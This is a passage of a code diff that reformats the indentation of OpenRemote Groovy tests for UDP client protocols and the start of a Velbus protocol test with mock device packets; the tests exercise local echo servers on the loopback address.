+      def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+      datapoints.size() == 0
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/udp/UdpClientProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/udp/UdpClientProtocolTest.groovy
@@ -53,284 +53,290 @@ import static org.openremote.model.value.ValueType.*
 
 class UdpClientProtocolTest extends Specification implements ManagerContainerTrait {
 
-    def "Check UDP client protocol and linked attribute deployment"() {
+  def "Check UDP client protocol and linked attribute deployment"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+    and: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
 
-        when: "a simple UDP echo server is started"
-        def echoServerPort = findEphemeralPort()
-        def clientPort = findEphemeralPort()
-        AbstractUDPServer echoServer = new UDPStringServer(new InetSocketAddress("127.0.0.1", echoServerPort), ";", Integer.MAX_VALUE, true)
-        def echoSkipCount = 0
-        def clientActualPort = null
-        def lastCommand = null
-        def lastSend = null
-        def receivedMessages = new CopyOnWriteArrayList()
-        echoServer.addMessageConsumer({
-            message, channel, sender ->
-                clientActualPort = sender.port
-                lastCommand = message
-                receivedMessages.add(message)
+    when: "a simple UDP echo server is started"
+    def echoServerPort = findEphemeralPort()
+    def clientPort = findEphemeralPort()
+    AbstractUDPServer echoServer = new UDPStringServer(new InetSocketAddress("127.0.0.1", echoServerPort), ";", Integer.MAX_VALUE, true)
+    def echoSkipCount = 0
+    def clientActualPort = null
+    def lastCommand = null
+    def lastSend = null
+    def receivedMessages = new CopyOnWriteArrayList()
+    echoServer.addMessageConsumer({ message, channel, sender ->
+      clientActualPort = sender.port
+      lastCommand = message
+      receivedMessages.add(message)
 
-                if (echoSkipCount == 0) {
-                    echoServer.sendMessage(message + ";", sender)
-                    lastSend = message
-                } else {
-                    echoSkipCount--
-                }
-        })
-        echoServer.start()
+      if (echoSkipCount == 0) {
+        echoServer.sendMessage(message + ";", sender)
+        lastSend = message
+      } else {
+        echoSkipCount--
+      }
+    })
+    echoServer.start()
 
-        then: "the UDP echo server should be connected"
-        conditions.eventually {
-            assert echoServer.connectionStatus == ConnectionStatus.CONNECTED
-        }
+    then: "the UDP echo server should be connected"
+    conditions.eventually {
+      assert echoServer.connectionStatus == ConnectionStatus.CONNECTED
+    }
 
-        when: "a UDP client agent is created"
-        def agent = new UDPAgent("Test agent")
-        agent.setRealm(Constants.MASTER_REALM)
+    when: "a UDP client agent is created"
+    def agent = new UDPAgent("Test agent")
+    agent.setRealm(Constants.MASTER_REALM)
             .setHost("127.0.0.1")
             .setPort(echoServerPort)
             .setBindPort(clientPort)
             .setMessageDelimiters([";"] as String[])
             .setMessageStripDelimiter(true)
 
-        and: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
+    and: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol instance should be created and should become connected"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert agentService.agents.get(agent.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
+    then: "the protocol instance should be created and should become connected"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert agentService.agents.get(agent.id).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
 
-        when: "an asset is created with attributes linked to the agent"
-        def asset = new ThingAsset("Test Asset")
+    when: "an asset is created with attributes linked to the agent"
+    def asset = new ThingAsset("Test Asset")
             .setParent(agent)
             .addOrReplaceAttributes(
             new Attribute<>("startHello", EXECUTION_STATUS)
-                .addMeta(
+            .addMeta(
                     new MetaItem<>(AGENT_LINK, new DefaultAgentLink(agent.id)
-                        .setWriteValue("abcdef"))
-                ),
+                    .setWriteValue("abcdef"))
+                    ),
             new Attribute<>("echoHello", TEXT)
-                .addMeta(
+            .addMeta(
                     new MetaItem<>(AGENT_LINK, new DefaultAgentLink(agent.id)
-                        .setWriteValue('Hello %VALUE%;'))
-                ),
+                    .setWriteValue('Hello %VALUE%;'))
+                    ),
             new Attribute<>("echoWorld", TEXT)
-                .addMeta(
+            .addMeta(
                     new MetaItem<>(AGENT_LINK, new DefaultAgentLink(agent.id)
                     .setWriteValue("World;"))
-                ),
+                    ),
             new Attribute<>("responseHello", TEXT)
-                .addMeta(
+            .addMeta(
                     new MetaItem<>(AGENT_LINK, new DefaultAgentLink(agent.id)
-                        .setMessageMatchPredicate(
+                    .setMessageMatchPredicate(
                             new StringPredicate(AssetQuery.Match.BEGIN, true, "Hello"))
-                        )
-                ),
+                    )
+                    ),
             new Attribute<>("responseWorld", TEXT)
-                .addMeta(
+            .addMeta(
                     new MetaItem<>(AGENT_LINK, new DefaultAgentLink(agent.id)
-                        .setMessageMatchPredicate(
+                    .setMessageMatchPredicate(
                             new StringPredicate(AssetQuery.Match.BEGIN, true, "Hello"))
                     )
-                ),
+                    ),
             new Attribute<>("updateOnWrite", TEXT)
-                .addMeta(
+            .addMeta(
                     new MetaItem<>(AGENT_LINK, new DefaultAgentLink(agent.id)
-                        .setUpdateOnWrite(true)
-                            .setValueFilters([
-                                    new SubStringValueFilter(0, -1)
-                            ] as ValueFilter[])
+                    .setUpdateOnWrite(true)
+                    .setValueFilters([new SubStringValueFilter(0, -1)] as ValueFilter[])
                     )
-                ),
+                    ),
             new Attribute<>("anyValue", TEXT)
-                .addMeta(
+            .addMeta(
                     new MetaItem<>(AGENT_LINK, new DefaultAgentLink(agent.id)
-                        .setMessageMatchPredicate(
+                    .setMessageMatchPredicate(
                             new ValueAnyPredicate())
                     )
-                )
-        )
+                    )
+            )
 
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
 
-        then: "the attributes should be linked"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 7
-            assert ((UDPProtocol)agentService.getProtocolInstance(agent.id)).protocolMessageConsumers.size() == 3
-        }
+    then: "the attributes should be linked"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 7
+      assert ((UDPProtocol)agentService.getProtocolInstance(agent.id)).protocolMessageConsumers.size() == 3
+    }
 
-        when: "a linked attribute value is updated"
-        def attributeEvent = new AttributeEvent(asset.id,
+    when: "a linked attribute value is updated"
+    def attributeEvent = new AttributeEvent(asset.id,
             "echoHello",
             "there")
-        assetProcessingService.sendAttributeEvent(attributeEvent)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        then: "the server should have received the request"
-        conditions.eventually {
-            assert receivedMessages.indexOf("Hello there") >= 0
-        }
+    then: "the server should have received the request"
+    conditions.eventually {
+      assert receivedMessages.indexOf("Hello there") >= 0
+    }
 
-        and: "the server should have responded and the responseWorld attribute should be updated"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.id)
-            assert asset.getAttribute("responseWorld").flatMap{it.getValue()}.orElse(null) == "Hello there"
-        }
+    and: "the server should have responded and the responseWorld attribute should be updated"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.id)
+      assert asset.getAttribute("responseWorld").flatMap{
+        it.getValue()
+      }.orElse(null) == "Hello there"
+    }
 
-        when: "the update on write attribute is written to which wouldn't generate a response from the server"
-        echoSkipCount = 1
-        attributeEvent = new AttributeEvent(asset.id,
-                "updateOnWrite",
-                "No response;")
-        assetProcessingService.sendAttributeEvent(attributeEvent)
+    when: "the update on write attribute is written to which wouldn't generate a response from the server"
+    echoSkipCount = 1
+    attributeEvent = new AttributeEvent(asset.id,
+            "updateOnWrite",
+            "No response;")
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        then: "the server should have received the request but not responded"
-        conditions.eventually {
-            assert receivedMessages.indexOf("No response") >= 0
-        }
+    then: "the server should have received the request but not responded"
+    conditions.eventually {
+      assert receivedMessages.indexOf("No response") >= 0
+    }
 
-        and: "the attribute value should have been updated"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.id)
-            assert asset.getAttribute("updateOnWrite").flatMap{it.getValue()}.orElse(null) == "No response"
-        }
+    and: "the attribute value should have been updated"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.id)
+      assert asset.getAttribute("updateOnWrite").flatMap{
+        it.getValue()
+      }.orElse(null) == "No response"
+    }
 
-        when: "the server sends a message to the client"
-        echoServer.sendMessage("anyValueTest;", new InetSocketAddress("127.0.0.1", clientPort))
+    when: "the server sends a message to the client"
+    echoServer.sendMessage("anyValueTest;", new InetSocketAddress("127.0.0.1", clientPort))
 
-        then: "the any value message match attribute should be updated"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.id)
-            assert asset.getAttribute("anyValue").flatMap{it.getValue()}.orElse(null) == "anyValueTest"
-        }
+    then: "the any value message match attribute should be updated"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.id)
+      assert asset.getAttribute("anyValue").flatMap{
+        it.getValue()
+      }.orElse(null) == "anyValueTest"
+    }
 
-        when: "the agent is disabled"
-        agent.setDisabled(true)
-        agent = assetStorageService.merge(agent)
+    when: "the agent is disabled"
+    agent.setDisabled(true)
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol instance should be unlinked"
-        conditions.eventually {
-            assert !agentService.protocolInstanceMap.containsKey(agent.id)
-        }
+    then: "the protocol instance should be unlinked"
+    conditions.eventually {
+      assert !agentService.protocolInstanceMap.containsKey(agent.id)
+    }
 
-        when: "the received messages are cleared"
-        receivedMessages.clear()
+    when: "the received messages are cleared"
+    receivedMessages.clear()
 
-        then: "after a while no more messages should be received by the server"
-        new PollingConditions(timeout: 5, initialDelay: 1).eventually {
-            assert receivedMessages.isEmpty()
-        }
+    then: "after a while no more messages should be received by the server"
+    new PollingConditions(timeout: 5, initialDelay: 1).eventually {
+      assert receivedMessages.isEmpty()
+    }
 
-        when: "the agent is re-enabled"
-        agent.setDisabled(false)
-        agent = assetStorageService.merge(agent)
+    when: "the agent is re-enabled"
+    agent.setDisabled(false)
+    agent = assetStorageService.merge(agent)
 
-        then: "the attributes should be re-linked"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 7
-            assert ((UDPProtocol)agentService.getProtocolInstance(agent.id)).protocolMessageConsumers.size() == 3
-        }
+    then: "the attributes should be re-linked"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 7
+      assert ((UDPProtocol)agentService.getProtocolInstance(agent.id)).protocolMessageConsumers.size() == 3
+    }
 
-        when: "the echo server is changed to a byte based server"
-        echoServer.stop()
-        echoServer.removeAllMessageConsumers()
-        echoServer = new AbstractUDPServer<byte[]>(new InetSocketAddress(echoServerPort)) {
+    when: "the echo server is changed to a byte based server"
+    echoServer.stop()
+    echoServer.removeAllMessageConsumers()
+    echoServer = new AbstractUDPServer<byte[]>(new InetSocketAddress(echoServerPort)) {
 
-            @Override
-            protected void addDecoders(DatagramChannel channel) {
+              @Override
+              protected void addDecoders(DatagramChannel channel) {
                 addDecoder(channel, new FixedLengthFrameDecoder(3))
                 addDecoder(channel, new ByteArrayDecoder())
-            }
+              }
 
-            @Override
-            protected void addEncoders(DatagramChannel channel) {
+              @Override
+              protected void addEncoders(DatagramChannel channel) {
                 addEncoder(channel, new MessageToMessageEncoder<byte[]>() {
 
-                    @Override
-                    protected void encode(ChannelHandlerContext channelHandlerContext, byte[] bytes, List<Object> out) throws Exception {
-                        out.add(Unpooled.copiedBuffer(bytes))
-                    }
-                })
+                          @Override
+                          protected void encode(ChannelHandlerContext channelHandlerContext, byte[] bytes, List<Object> out) throws Exception {
+                            out.add(Unpooled.copiedBuffer(bytes))
+                          }
+                        })
+              }
             }
-        }
-        byte[] lastBytes = null
-        echoServer.addMessageConsumer({
-            message, channel, sender ->
-                lastBytes = message
-        })
-        echoServer.start()
+    byte[] lastBytes = null
+    echoServer.addMessageConsumer({ message, channel, sender ->
+      lastBytes = message
+    })
+    echoServer.start()
 
-        then: "the server should be connected"
-        conditions.eventually {
-            assert echoServer.connectionStatus == ConnectionStatus.CONNECTED
-        }
+    then: "the server should be connected"
+    conditions.eventually {
+      assert echoServer.connectionStatus == ConnectionStatus.CONNECTED
+    }
 
-        when: "the agent is updated to use HEX mode"
-        agent.setMessageDelimiters(null)
-        agent.setMessageConvertHex(true)
-        agent = assetStorageService.merge(agent)
+    when: "the agent is updated to use HEX mode"
+    agent.setMessageDelimiters(null)
+    agent.setMessageConvertHex(true)
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol should be relinked"
-        conditions.eventually {
-            assert agentService.agents.get(agent.id) != null
-            assert ((UDPAgent)agentService.agents.get(agent.id)).getMessageConvertHex().orElse(false)
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 7
-            assert ((UDPProtocol)agentService.getProtocolInstance(agent.id)).protocolMessageConsumers.size() == 3
-        }
+    then: "the protocol should be relinked"
+    conditions.eventually {
+      assert agentService.agents.get(agent.id) != null
+      assert ((UDPAgent)agentService.agents.get(agent.id)).getMessageConvertHex().orElse(false)
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 7
+      assert ((UDPProtocol)agentService.getProtocolInstance(agent.id)).protocolMessageConsumers.size() == 3
+    }
 
-        and: "the protocol should become CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id, Agent.class)
-            assert agent.getAgentStatus().orElse(ConnectionStatus.DISCONNECTED) == ConnectionStatus.CONNECTED
-        }
+    and: "the protocol should become CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id, Agent.class)
+      assert agent.getAgentStatus().orElse(ConnectionStatus.DISCONNECTED) == ConnectionStatus.CONNECTED
+    }
 
-        when: "the echo world attribute is also updated to work with hex server"
-        asset = assetStorageService.find(asset.id)
-        asset.getAttribute("echoWorld").get().getMetaValue(AGENT_LINK).get().setWriteValue("123456")
-        asset = assetStorageService.merge(asset)
+    when: "the echo world attribute is also updated to work with hex server"
+    asset = assetStorageService.find(asset.id)
+    asset.getAttribute("echoWorld").get().getMetaValue(AGENT_LINK).get().setWriteValue("123456")
+    asset = assetStorageService.merge(asset)
 
-        then: "the attribute should be updated"
-        asset.getAttribute("echoWorld").get().getMetaValue(AGENT_LINK).get().getWriteValue().get() == "123456"
+    then: "the attribute should be updated"
+    asset.getAttribute("echoWorld").get().getMetaValue(AGENT_LINK).get().getWriteValue().get() == "123456"
 
-        then: "the attributes should be relinked"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 7
-            assert ((UDPProtocol)agentService.getProtocolInstance(agent.id)).protocolMessageConsumers.size() == 3
-            assert agentService.getProtocolInstance(agent.id).linkedAttributes.get(new AttributeRef(asset.getId(), "echoWorld")).getMetaItem(AGENT_LINK).flatMap{it.value}.flatMap{it.writeValue}.orElse(null) == "123456"
-        }
+    then: "the attributes should be relinked"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 7
+      assert ((UDPProtocol)agentService.getProtocolInstance(agent.id)).protocolMessageConsumers.size() == 3
+      assert agentService.getProtocolInstance(agent.id).linkedAttributes.get(new AttributeRef(asset.getId(), "echoWorld")).getMetaItem(AGENT_LINK).flatMap{
+        it.value
+      }.flatMap{
+        it.writeValue
+      }.orElse(null) == "123456"
+    }
 
-        when: "the start hello linked attribute is executed"
-        attributeEvent = new AttributeEvent(asset.id,
+    when: "the start hello linked attribute is executed"
+    attributeEvent = new AttributeEvent(asset.id,
             "startHello",
             AttributeExecuteStatus.REQUEST_START)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        then: "the bytes should be received by the server"
-        conditions.eventually {
-            assert lastBytes != null
-            assert lastBytes.length == 3
-            assert (lastBytes[0] & 0xFF) == 171
-            assert (lastBytes[1] & 0xFF) == 205
-            assert (lastBytes[2] & 0xFF) == 239
-        }
-
-        cleanup: "the server should be stopped"
-        if (echoServer != null) {
-            echoServer.stop()
-        }
+    then: "the bytes should be received by the server"
+    conditions.eventually {
+      assert lastBytes != null
+      assert lastBytes.length == 3
+      assert (lastBytes[0] & 0xFF) == 171
+      assert (lastBytes[1] & 0xFF) == 205
+      assert (lastBytes[2] & 0xFF) == 239
     }
+
+    cleanup: "the server should be stopped"
+    if (echoServer != null) {
+      echoServer.stop()
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/udp/UdpClientTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/udp/UdpClientTest.groovy
@@ -39,132 +39,130 @@ import java.util.function.Consumer
  */
 class UdpClientTest extends Specification implements ManagerContainerTrait {
 
-    def "Check client"() {
+  def "Check client"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.2)
 
-        and: "the container is started"
-        def clientPort = findEphemeralPort()
-        def container = startContainer(defaultConfig(), [new TimerService()])
+    and: "the container is started"
+    def clientPort = findEphemeralPort()
+    def container = startContainer(defaultConfig(), [new TimerService()])
 
-        and: "a simple UDP echo server"
-        def echoServerPort = findEphemeralPort()
-        def echoServer = new UDPStringServer(new InetSocketAddress("127.0.0.1", echoServerPort), ";", Integer.MAX_VALUE, true)
-        echoServer.addMessageConsumer({
-            message, channel, sender ->
-                echoServer.sendMessage(message, sender)
-        })
+    and: "a simple UDP echo server"
+    def echoServerPort = findEphemeralPort()
+    def echoServer = new UDPStringServer(new InetSocketAddress("127.0.0.1", echoServerPort), ";", Integer.MAX_VALUE, true)
+    echoServer.addMessageConsumer({ message, channel, sender ->
+      echoServer.sendMessage(message, sender)
+    })
 
-        and: "we add callback consumers on the server"
-        def serverConnectionStatus = echoServer.connectionStatus
-        echoServer.addConnectionStatusConsumer((Consumer<ConnectionStatus>) {
-            status -> serverConnectionStatus = status
-        })
+    and: "we add callback consumers on the server"
+    def serverConnectionStatus = echoServer.connectionStatus
+    echoServer.addConnectionStatusConsumer((Consumer<ConnectionStatus>) { status ->
+      serverConnectionStatus = status
+    })
 
-        and: "a simple UDP broadcast client"
-        UDPIOClient<String> client = new UDPIOClient<String>(
-                "127.0.0.1",
-                echoServerPort,
-                clientPort)
-        client.setEncoderDecoderProvider({
-            [
-                new StringEncoder(CharsetUtil.UTF_8),
-                new StringDecoder(CharsetUtil.UTF_8),
-                new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
-            ].toArray(new ChannelHandler[0])
-        })
+    and: "a simple UDP broadcast client"
+    UDPIOClient<String> client = new UDPIOClient<String>(
+            "127.0.0.1",
+            echoServerPort,
+            clientPort)
+    client.setEncoderDecoderProvider({
+      [
+        new StringEncoder(CharsetUtil.UTF_8),
+        new StringDecoder(CharsetUtil.UTF_8),
+        new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
+      ].toArray(new ChannelHandler[0])
+    })
 
-        and: "we add callback consumers to the client"
-        def connectionStatus = client.getConnectionStatus()
-        String lastMessage
-        client.addMessageConsumer({
-            message ->
-                lastMessage = message
-        })
-        client.addConnectionStatusConsumer({
-            status -> connectionStatus = status
-        })
+    and: "we add callback consumers to the client"
+    def connectionStatus = client.getConnectionStatus()
+    String lastMessage
+    client.addMessageConsumer({ message ->
+      lastMessage = message
+    })
+    client.addConnectionStatusConsumer({ status ->
+      connectionStatus = status
+    })
 
-        when: "the server is started"
-        echoServer.start()
+    when: "the server is started"
+    echoServer.start()
 
-        then: "the server should be running"
-        conditions.eventually {
-            assert echoServer.connectionStatus == ConnectionStatus.CONNECTED
-            assert serverConnectionStatus == ConnectionStatus.CONNECTED
-        }
-
-        when: "we call connect on the client"
-        client.connect()
-
-        then: "the client status should become CONNECTED"
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatus == ConnectionStatus.CONNECTED
-        }
-
-        when: "the server sends a broadcast message"
-        echoServer.sendMessage("Hello world", SocketUtils.socketAddress("127.0.0.1", clientPort))
-
-        then: "we should receive the message"
-        conditions.eventually {
-            assert lastMessage == "Hello world"
-        }
-
-        when: "we send a message to the server"
-        client.sendMessage("Test;")
-
-        then: "we should get the same message back"
-        conditions.eventually {
-            assert lastMessage == "Test"
-        }
-
-        when: "we request the client to disconnect"
-        client.disconnect()
-
-        then: "the client should become DISCONNECTED"
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.DISCONNECTED
-            assert connectionStatus == ConnectionStatus.DISCONNECTED
-        }
-
-        when: "we reconnect the same client"
-        client.connect()
-
-        then: "the client status should become CONNECTED"
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.CONNECTED
-            assert connectionStatus == ConnectionStatus.CONNECTED
-        }
-
-        when: "the server sends a message to the loopback interface"
-        echoServer.sendMessage("Is there anyone there?", SocketUtils.socketAddress("127.0.0.1", clientPort))
-
-        then: "we should receive the message"
-        conditions.eventually {
-            assert lastMessage == "Is there anyone there?"
-        }
-
-        when: "we send a message to the server"
-        client.sendMessage("Yes there is!;")
-
-        then: "we should get the same message back"
-        conditions.eventually {
-            assert lastMessage == "Yes there is!"
-        }
-
-        when: "we request the processor to disconnect"
-        client.disconnect()
-
-        then: "the client should become DISCONNECTED"
-        conditions.eventually {
-            assert client.connectionStatus == ConnectionStatus.DISCONNECTED
-            assert connectionStatus == ConnectionStatus.DISCONNECTED
-        }
-
-        cleanup: "the server should be stopped"
-        client.disconnect()
-        echoServer.stop()
+    then: "the server should be running"
+    conditions.eventually {
+      assert echoServer.connectionStatus == ConnectionStatus.CONNECTED
+      assert serverConnectionStatus == ConnectionStatus.CONNECTED
     }
+
+    when: "we call connect on the client"
+    client.connect()
+
+    then: "the client status should become CONNECTED"
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatus == ConnectionStatus.CONNECTED
+    }
+
+    when: "the server sends a broadcast message"
+    echoServer.sendMessage("Hello world", SocketUtils.socketAddress("127.0.0.1", clientPort))
+
+    then: "we should receive the message"
+    conditions.eventually {
+      assert lastMessage == "Hello world"
+    }
+
+    when: "we send a message to the server"
+    client.sendMessage("Test;")
+
+    then: "we should get the same message back"
+    conditions.eventually {
+      assert lastMessage == "Test"
+    }
+
+    when: "we request the client to disconnect"
+    client.disconnect()
+
+    then: "the client should become DISCONNECTED"
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.DISCONNECTED
+      assert connectionStatus == ConnectionStatus.DISCONNECTED
+    }
+
+    when: "we reconnect the same client"
+    client.connect()
+
+    then: "the client status should become CONNECTED"
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.CONNECTED
+      assert connectionStatus == ConnectionStatus.CONNECTED
+    }
+
+    when: "the server sends a message to the loopback interface"
+    echoServer.sendMessage("Is there anyone there?", SocketUtils.socketAddress("127.0.0.1", clientPort))
+
+    then: "we should receive the message"
+    conditions.eventually {
+      assert lastMessage == "Is there anyone there?"
+    }
+
+    when: "we send a message to the server"
+    client.sendMessage("Yes there is!;")
+
+    then: "we should get the same message back"
+    conditions.eventually {
+      assert lastMessage == "Yes there is!"
+    }
+
+    when: "we request the processor to disconnect"
+    client.disconnect()
+
+    then: "the client should become DISCONNECTED"
+    conditions.eventually {
+      assert client.connectionStatus == ConnectionStatus.DISCONNECTED
+      assert connectionStatus == ConnectionStatus.DISCONNECTED
+    }
+
+    cleanup: "the server should be stopped"
+    client.disconnect()
+    echoServer.stop()
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/velbus/VelbusBasicTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/velbus/VelbusBasicTest.groovy
@@ -35,2829 +35,2710 @@ import java.util.concurrent.Executors
 import static spock.util.matcher.HamcrestMatchers.closeTo
 
 class VelbusBasicTest extends Specification {
-    @Shared
-    def static VelbusNetwork network
-
-    @Shared
-    def static MockVelbusClient messageProcessor = new MockVelbusClient()
-
-    @Shared
-    def static PollingConditions conditions = new PollingConditions(timeout: 5, delay: 0.2)
-
-    static loadDevicePackets(MockVelbusClient messageProcessor) {
-        messageProcessor.mockPackets = [
-
-            /*
-            * INPUT BUTTON PROCESSOR PACKETS
-            */
-
-            // Module type request for address 1 - return VMB4AN packets
-            "0F FB 02 40 B4 04 00 00 00 00 00 00 00 00": [
-                "0F FB 02 07 FF 32 00 01 01 17 25 7E 04 00"
-            ],
-
-            // Module Status for address 2
-            "0F FB 02 02 FA FF F9 04 00 00 00 00 00 00": [
-                "0F FB 02 06 ED 10 04 00 01 00 EC 04 00 00",
-                "0F FB 02 08 B8 0C 00 00 00 00 00 00 28 04",
-                "0F FB 02 08 B8 0D 00 00 00 00 00 00 27 04",
-                "0F FB 02 08 B8 0E 00 00 00 00 00 00 26 04",
-                "0F FB 02 08 B8 0F 00 00 00 00 00 00 25 04"
-            ],
-
-            // Read memory 1 address 2
-            "0F FB 02 03 C9 00 46 E2 04 00 00 00 00 00": [
-                "0F FB 02 07 CC 00 46 07 00 16 00 BE 04 00"
-            ],
-
-            // Read memory 2 address 2
-            "0F FB 02 03 C9 00 4A DE 04 00 00 00 00 00": [
-                "0F FB 02 07 CC 00 4A 08 00 17 00 B8 04 00"
-            ],
-
-            // VMB4AN Sensor 1 Readout
-            "0F FB 02 03 E5 08 00 04 04 00 00 00 00 00": [
-                "0F FB 02 06 A9 08 02 00 11 27 03 04 00 00",
-                "0F FB 02 08 AC 08 00 32 35 2E 32 B0 C1 04",
-                "0F FB 02 05 AC 08 05 43 00 F3 04 00 00 00",
-                "0F FB 02 07 EA 08 06 00 00 0A 0A E1 04 00"
-            ],
-
-            // VMB4AN Sensor 2 Readout
-            "0F FB 02 03 E5 09 00 03 04 00 00 00 00 00": [
-                "0F FB 02 06 A9 09 01 00 00 0E 2D 04 00 00",
-                "0F FB 02 08 AC 09 00 30 55 6E 69 74 67 04",
-                "0F FB 02 04 AC 09 05 00 36 04 00 00 00 00",
-                "0F FB 02 07 EA 09 05 00 00 01 01 F3 04 00"
-            ],
-
-            // VMB4AN Sensor 3 Readout
-            "0F FB 02 03 E5 0A 00 02 04 00 00 00 00 00": [
-                "0F FB 02 06 A9 0A 00 00 00 2B 10 04 00 00",
-                "0F FB 02 08 AC 0A 00 30 55 6E 69 74 66 04",
-                "0F FB 02 04 AC 0A 05 00 35 04 00 00 00 00",
-                "0F FB 02 07 EA 0A 04 00 00 01 01 F3 04 00"
-            ],
-
-            // VMB4AN Sensor 4 Readout
-            "0F FB 02 03 E5 0B 00 01 04 00 00 00 00 00": [
-                "0F FB 02 06 A9 0B 00 00 00 2B 0F 04 00 00",
-                "0F FB 02 08 AC 0B 00 30 55 6E 69 74 65 04",
-                "0F FB 02 04 AC 0B 05 00 34 04 00 00 00 00",
-                "0F FB 02 07 EA 0B 04 00 00 01 01 F2 04 00"
-            ],
-
-            // VMB4AN Sensor 1 Settings
-            "0F FB 02 02 E7 08 03 04 00 00 00 00 00 00": [
-                "0F FB 02 08 E8 08 FF FF FF 00 0C 8C 67 04",
-                "0F FB 02 08 E9 08 FF 00 00 FF FF FF FF 04"
-            ],
-
-            // VMB4AN Sensor 2 Settings
-            "0F FB 02 02 E7 09 02 04 00 00 00 00 00 00": [
-                "0F FB 02 08 E8 09 FF FF FF 00 00 00 FE 04",
-                "0F FB 02 08 E9 09 FF FF FF FF FF FF 00 04"
-            ],
-
-            // VMB4AN Sensor 3 Settings
-            "0F FB 02 02 E7 0A 01 04 00 00 00 00 00 00": [
-                "0F FB 02 08 E8 0A FF FF FF FF FF 00 FF 04",
-                "0F FB 02 08 E9 0A FF FF FF FF FF FF FF 04"
-            ],
-
-            // VMB4AN Sensor 4 Settings
-            "0F FB 02 02 E7 0B 00 04 00 00 00 00 00 00": [
-                "0F FB 02 08 E8 0B FF FF FF FF FF 00 FE 04",
-                "0F FB 02 08 E9 0B FF FF FF FF FF FF FE 04"
-            ],
-
-            // VMB4AN Lock channel for 1s
-            "0F F8 02 05 12 07 00 00 01 D8 04 00 00 00": [
-                "0F FB 02 06 ED 10 84 00 01 00 6C 04 00 00"
-            ],
-
-            // VMB4AN lock channel indefinitely
-            "0F F8 02 05 12 07 FF FF FF DC 04 00 00 00": [
-                "0F FB 02 06 ED 10 84 00 01 00 6C 04 00 00"
-            ],
-
-
-
-            // Module Type request for address 48 - return VMBGPOD Packets
-            "0F FB 30 40 86 04 00 00 00 00 00 00 00 00": [
-                "0F FB 30 07 FF 28 00 02 01 16 12 6D 04 00",
-                "0F FB 30 08 B0 28 00 02 31 32 FF 40 42 04"
-                //"0F FB 30 08 B0 28 00 02 31 32 33 40 0E 04"
-            ],
-
-            // Module Status request for address 48
-            "0F FB 30 02 FA 00 CA 04 00 00 00 00 00 00": [
-                "0F FB 30 07 ED 00 FF FF 00 00 8D 47 04 00",
-                "0F FB 31 07 ED 00 FF FF 00 10 8D 36 04 00",
-                "0F FB 32 07 ED 00 FF FF 00 00 8D 45 04 00",
-            ],
-
